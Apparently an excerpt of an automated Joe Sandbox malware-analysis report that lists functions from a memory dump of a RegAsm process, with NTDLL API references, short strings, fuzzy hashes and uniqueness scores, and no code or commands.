KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 2638914809-3129563594
Opcode ID: aaaa8c65dbd753b5085731ffb2b53fba5f61a7b6afef8587c6f2034500a3abd9
Instruction ID: 81fa85cab2cfc070d4a44d7bee4961c8b3f7173439c03b6119914d449eece7f9
Opcode Fuzzy Hash: aaaa8c65dbd753b5085731ffb2b53fba5f61a7b6afef8587c6f2034500a3abd9
Instruction Fuzzy Hash: 05E11A74A006198FCB68DF64CD9079EB7B2EF88300F1086A9C509E7394DA356E92CF95

Uniqueness

Uniqueness Score: 100.00%

Function 22CF2020, Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 328libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 243558500-3129563594
Opcode ID: eea009b74d27d53cfce2ee524a9b79da4a9eb477f74d29988773f25c78341974
Instruction ID: 99f30c9cd1557754297c14c33689888028d8c890b3434827e48b5d5f0f77df9c
Opcode Fuzzy Hash: eea009b74d27d53cfce2ee524a9b79da4a9eb477f74d29988773f25c78341974
Instruction Fuzzy Hash: 01E12A74E006198FCB68DF64CD9079EB7B2EF88300F1086A9C509E7394DA356E92CF95

Uniqueness

Uniqueness Score: 100.00%

Function 22CF2281, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 271UNIQUE

Download Yara Rule

Strings

@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID: ?$ B$@?$@B$?$B
API String ID: 0-974890285
Opcode ID: ed21163c9a14b4bedf1eb05724c34e42fe48999c5777c2b96471f13a44c17ba2
Instruction ID: 62464931b9db1dc8edf6aea74619275f4ad06d269e78bf70fc9cf0ffe598bf0a
Opcode Fuzzy Hash: ed21163c9a14b4bedf1eb05724c34e42fe48999c5777c2b96471f13a44c17ba2
Instruction Fuzzy Hash: 29C15F74A406198FCB64DF25DC90B9EB7B3EF88310F1082E9C509A7394DA359E92CF95

Uniqueness

Uniqueness Score: 100.00%

Function 22CF26AE, Relevance: 1.9, APIs: 1, Instructions: 422COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 14f420c3847d84aa05bc6efb04ea65d47e108466bdbb2ba9512576f8d7e152fe
Instruction ID: 398600f383bcd83e40146fcdd4b77e0c2f65d67eb8e99a57622964fddd52e42b
Opcode Fuzzy Hash: 14f420c3847d84aa05bc6efb04ea65d47e108466bdbb2ba9512576f8d7e152fe
Instruction Fuzzy Hash: 142273B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355DB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2702, Relevance: 1.9, APIs: 1, Instructions: 412COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a803ca7878f7c770d3408a6b42ddb95cdfdf4bdd3fab275998d6f909da73c90e
Instruction ID: 5f026e3b1e663411b31351adfd14850cd6d3723bfe00c340a880396724ea6f2a
Opcode Fuzzy Hash: a803ca7878f7c770d3408a6b42ddb95cdfdf4bdd3fab275998d6f909da73c90e
Instruction Fuzzy Hash: B02283B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D90DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2762, Relevance: 1.9, APIs: 1, Instructions: 399COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bb29e41920e585519762f940683253974df1cf54c6cb093c8229871fae991b36
Instruction ID: 1921c22e24445b64f7ea90e33daf855afb404d753b667dd06302ee5a3118eb9a
Opcode Fuzzy Hash: bb29e41920e585519762f940683253974df1cf54c6cb093c8229871fae991b36
Instruction Fuzzy Hash: 392272B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF27B6, Relevance: 1.9, APIs: 1, Instructions: 389COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4d6a539a53b5c4e4c30851db5203044a47eb1ab04c2d98a1cda6d3fb8cf1eda0
Instruction ID: 51dc46cae6b01e04e4beb98383074815145fe2e58919c384c44a697066e4bf03
Opcode Fuzzy Hash: 4d6a539a53b5c4e4c30851db5203044a47eb1ab04c2d98a1cda6d3fb8cf1eda0
Instruction Fuzzy Hash: 052272B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF280A, Relevance: 1.9, APIs: 1, Instructions: 379COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 186729b9a1b5f8b281a3686910c3cd10f898bbe2a5561cf2e6f54f074f719089
Instruction ID: 1a4a1bbfc1538deab48dec43a2e82096d87d475e869c1cb9d03f9321a4acb798
Opcode Fuzzy Hash: 186729b9a1b5f8b281a3686910c3cd10f898bbe2a5561cf2e6f54f074f719089
Instruction Fuzzy Hash: 181273B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF285E, Relevance: 1.9, APIs: 1, Instructions: 369COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e0f8c65e59c7ae0ea8f808559f1bc917d4851b02ba0d586c0f0d5a10a7251aa0
Instruction ID: 7cc97a827ed79624d0a2fc0afdc1f6c7eddf9f9d8315fe0f44071b061514bbe8
Opcode Fuzzy Hash: e0f8c65e59c7ae0ea8f808559f1bc917d4851b02ba0d586c0f0d5a10a7251aa0
Instruction Fuzzy Hash: 631283B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D90DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF28B2, Relevance: 1.9, APIs: 1, Instructions: 359COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 025c326d59f8814a6568763286dc82819ee5ff952605ff4178887ba6d8a32eef
Instruction ID: b386b87d29efb5070710205ac6b0b8fdd057189a7d279a98f1638d981d3fb5db
Opcode Fuzzy Hash: 025c326d59f8814a6568763286dc82819ee5ff952605ff4178887ba6d8a32eef
Instruction Fuzzy Hash: CF1293B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D90DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2906, Relevance: 1.8, APIs: 1, Instructions: 349COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ba1bf0d9894d44f62b7ff1ad7009bed6b6d88db1437a2ef898a8bda7b50f0782
Instruction ID: 1d85ffab8e043234e5d5e5262ca383cafb8eb676543868481cbfadf677f87002
Opcode Fuzzy Hash: ba1bf0d9894d44f62b7ff1ad7009bed6b6d88db1437a2ef898a8bda7b50f0782
Instruction Fuzzy Hash: 520283B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF295A, Relevance: 1.8, APIs: 1, Instructions: 339COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 441bd73d7a8c93e38a2f9f0311fe709d9287a968847c926a562bb365ecabeec7
Instruction ID: d5876cc017498411f85050b559c8a02e250784043947b2ae46fc83072e89ffac
Opcode Fuzzy Hash: 441bd73d7a8c93e38a2f9f0311fe709d9287a968847c926a562bb365ecabeec7
Instruction Fuzzy Hash: 980283B4E11228CFEBA0CF24C944A99BBF2BF48211F0484D6D91DA7355EB719E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF29AE, Relevance: 1.8, APIs: 1, Instructions: 329COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a35243dc73a848d11870bd96e6a6679980236c3f628f6e8773b1c6270e33ad17
Instruction ID: 99d545d36dc43556824318ad4c81f42e46f16eee6bf9b29f1a7ef1db77190c2a
Opcode Fuzzy Hash: a35243dc73a848d11870bd96e6a6679980236c3f628f6e8773b1c6270e33ad17
Instruction Fuzzy Hash: D40293B4E11228CFEBA0CF24C944A99BBF2BF48210F0485D6D90DA7355EB719E91CF19

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2A02, Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 78c862951a2b978a19812a5a62eafcade236239b47975d5cd10f862989a70fa8
Instruction ID: 884b920e3c212fce7076efc404da793ed385fae25707cb79098230c84050f00b
Opcode Fuzzy Hash: 78c862951a2b978a19812a5a62eafcade236239b47975d5cd10f862989a70fa8
Instruction Fuzzy Hash: C3F183B4E11228CFEBA0CF24C944A99BBF2BF48210F0485D6D91DA7355EB719E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2A59, Relevance: 1.8, APIs: 1, Instructions: 309COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c5871b8aca5f6a849642d0e69e4196ce4f5a2fa01effe2869f139e5295e928f0
Instruction ID: 177575f1d7fb4beab8b72b55a0514701bbc89e6515a227db55bde3fa8796d8b3
Opcode Fuzzy Hash: c5871b8aca5f6a849642d0e69e4196ce4f5a2fa01effe2869f139e5295e928f0
Instruction Fuzzy Hash: 45F183B4E11228CFEBA0CF24C944A99BBF2BF88210F0485D6D90DA7355EB719E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2AB0, Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b6fa674e8d99f4d3d46abe77b5e97a20b91a731b1dcd5ba5a05cc440270d3902
Instruction ID: 6f137972a27bbb71fe2c18299796a4fb565bc7f0d9821ee25e4ca286c6db38a1
Opcode Fuzzy Hash: b6fa674e8d99f4d3d46abe77b5e97a20b91a731b1dcd5ba5a05cc440270d3902
Instruction Fuzzy Hash: 43F183B4E11228CFEBA0CF24C944A99BBF2BF88210F0485D6D90DA7355EB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2B07, Relevance: 1.8, APIs: 1, Instructions: 289COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3ee138f7fbc6e1bac399058f35393aab503dfbc8c80bc246dd3c54c82af4d7e0
Instruction ID: 02d93d111bf963e7ce1ba71b20f38ca668a64b992f077cf3019eadab5f47ac42
Opcode Fuzzy Hash: 3ee138f7fbc6e1bac399058f35393aab503dfbc8c80bc246dd3c54c82af4d7e0
Instruction Fuzzy Hash: 3EE183B4E11228CFEBA0CF24C944A99BBF2BF48210F0485D6D90DA7355EB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2B5E, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 966458899510626f109138349701b42567f8b8c194612ab9aadd0129d88babd6
Instruction ID: 182cff58da1962e32d1bbf256c9775eabd1a8b7b51d8e7f5dd9e0133cd70d2bb
Opcode Fuzzy Hash: 966458899510626f109138349701b42567f8b8c194612ab9aadd0129d88babd6
Instruction Fuzzy Hash: 76E183B4E11228CFEBA0CF24C944A99BBF2BF88210F0485D6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2BB5, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cf8027f401ec8c0bbc90cd731cd6c26f0426f8e46419ada257431f3e08fbb07a
Instruction ID: 0f3e780ea43a0ef28d65c31ea2ccc33da50f63f35942e99d9921baa512822c17
Opcode Fuzzy Hash: cf8027f401ec8c0bbc90cd731cd6c26f0426f8e46419ada257431f3e08fbb07a
Instruction Fuzzy Hash: FCE193B4E11228CFEBA0CF24C944A99BBF2BF88210F0485D6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2C0C, Relevance: 1.8, APIs: 1, Instructions: 259COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0e9f516720e91d34e609960b4fddb63b8aa93a8a0dbc1825b9b9e6b6fe8ae3da
Instruction ID: be8b35c7c0532385d16fe7d174dea435fc9503709138b9b8bd0876725dd15dcb
Opcode Fuzzy Hash: 0e9f516720e91d34e609960b4fddb63b8aa93a8a0dbc1825b9b9e6b6fe8ae3da
Instruction Fuzzy Hash: 61D182B4E11228CFEBA0CF24C944A99BBF2BF88210F0485D6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2C63, Relevance: 1.7, APIs: 1, Instructions: 249COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc5aa8eaab968b83050621aa73500ba53439475aa9d2ca1a1c44020d384b0754
Instruction ID: c6f420328a478f645df90a8c295da03ce0285dd5c22cd8c16d234526538d7511
Opcode Fuzzy Hash: dc5aa8eaab968b83050621aa73500ba53439475aa9d2ca1a1c44020d384b0754
Instruction Fuzzy Hash: 52D192B4E11228CFEBA0CF28C944A99BBF2BF88210F0485D6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2CBA, Relevance: 1.7, APIs: 1, Instructions: 239COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 282fb2ee212cc255b41c3970bf93f90e870232412b91687741c29418704174e5
Instruction ID: c91240a7ec87919321be5477db7754b27d9578ad9f8cbccc4290951099dc9e10
Opcode Fuzzy Hash: 282fb2ee212cc255b41c3970bf93f90e870232412b91687741c29418704174e5
Instruction Fuzzy Hash: CDC192B4E11228DFEBA0CF28C944A99BBF2BF88210F0484D6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2D11, Relevance: 1.7, APIs: 1, Instructions: 229COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 59b1bafcdd4d51bb762d688837c6f72b6346f36b35811fe0edb4e6e5a78d8d94
Instruction ID: ed6106a406e12f988ffaa82c523ac14cd198a531e6c3cbffff8553588346ea47
Opcode Fuzzy Hash: 59b1bafcdd4d51bb762d688837c6f72b6346f36b35811fe0edb4e6e5a78d8d94
Instruction Fuzzy Hash: 49C193B4E11228DFEBA0CF24C944B99BBF2BF88210F0484D6D909A7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2D68, Relevance: 1.7, APIs: 1, Instructions: 219COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6fb928278ba96978f9edfb7a07f2667ec9b49b80fea3b1ecc2a0da89a6c87833
Instruction ID: fafb7bd1f037be587a88e3d4f291b96b39a6f7ba1fa4402a4365ceaa7550948e
Opcode Fuzzy Hash: 6fb928278ba96978f9edfb7a07f2667ec9b49b80fea3b1ecc2a0da89a6c87833
Instruction Fuzzy Hash: 7DB193B4E11228DFEBA0CF24C944B99BBF2BF88210F0484E6D909A7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2DBF, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a1266cd3e9b28b9615f7ac350e6ce6a256dad74bbef7a4e4b4d274f821416ca2
Instruction ID: 547f329a18983d1b62c03c5370cf9aaf2816094f5809b3d3ca0efd9e9270c523
Opcode Fuzzy Hash: a1266cd3e9b28b9615f7ac350e6ce6a256dad74bbef7a4e4b4d274f821416ca2
Instruction Fuzzy Hash: 08B193B4E11228DFEBA0CF24C944B99BBF2BF48210F0485E6D909A7355D7759E90CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF7B60, Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 22CF7BD5

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0a963ad2b84375f2616139d8283ef51a1fcd7fff60f43b7d38c2e2f1a403966
Instruction ID: 952cbf5611a30195080a595e886f09bc93b8653625145e2d62cf52427149ef1b
Opcode Fuzzy Hash: d0a963ad2b84375f2616139d8283ef51a1fcd7fff60f43b7d38c2e2f1a403966
Instruction Fuzzy Hash: 99719231F103099FDB44DBB4C990ADEB7B6EB88304F10897AD905EB394DA35AD45CBA1

Uniqueness

Uniqueness Score: 0.02%

Function 22CF7B56, Relevance: 1.7, APIs: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 22CF7BD5

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09e84bbd3902e1de3ade57582031231e1fac3ae96765df5c280d157ff47d63d8
Instruction ID: 87acd535200225746d51bdbd738b0ed8274c822e81e8747ee040752061bfab5b
Opcode Fuzzy Hash: 09e84bbd3902e1de3ade57582031231e1fac3ae96765df5c280d157ff47d63d8
Instruction Fuzzy Hash: B971A271F103099FDB44DFB4C990ADEB7B6EB88304F10857AD805EB294DA759D05CBA0

Uniqueness

Uniqueness Score: 0.02%

Function 22CF2E16, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 833858e5527b32b1d1bedded4954e7d5aa0bcf2b61fb38944693f79f6a49f8dd
Instruction ID: a712dede3897fe17ac2b08e980fd1d15ecc87fe66023290599c97aa547021774
Opcode Fuzzy Hash: 833858e5527b32b1d1bedded4954e7d5aa0bcf2b61fb38944693f79f6a49f8dd
Instruction Fuzzy Hash: 76A194B4E01228DFEBA0CF28C944B99BBF2BF88214F0485E6D909A7355D7759E90CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2E6D, Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f13d8e9847f06700ad6fc4fe34a2e31bc99b370d2a34530deef0c93f6ebb23cc
Instruction ID: 5b9a1d8b977abd5084dda470ec1ad7d3ca3bc473674ca070e4e311087d9dc3db
Opcode Fuzzy Hash: f13d8e9847f06700ad6fc4fe34a2e31bc99b370d2a34530deef0c93f6ebb23cc
Instruction Fuzzy Hash: 22A195B4E01228DFEBA0CF24C944B99BBB2BF48214F0484E6D90DA7355DB759E91CF15

Uniqueness

Uniqueness Score: 0.05%

Function 22CF2F60, Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF2F87

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b910e5412c3402a481ff5e1fd37be8792b48ea3ec5c42cd0dcb507fe92b0a50e
Instruction ID: 462cd73d18a2a91a2677dcbc85d34c28a59c64ea15941f2974bd2b52203f2960
Opcode Fuzzy Hash: b910e5412c3402a481ff5e1fd37be8792b48ea3ec5c42cd0dcb507fe92b0a50e
Instruction Fuzzy Hash: 3C9194B4E01228DFEBA0CF28C984B99BBB2BF48314F0485D6D909A7255D7759E80CF15

Uniqueness

Uniqueness Score: 0.05%

Function 01127884, Relevance: 1.6, APIs: 1, Instructions: 121libraryCOMMON

Download Yara Rule

APIs

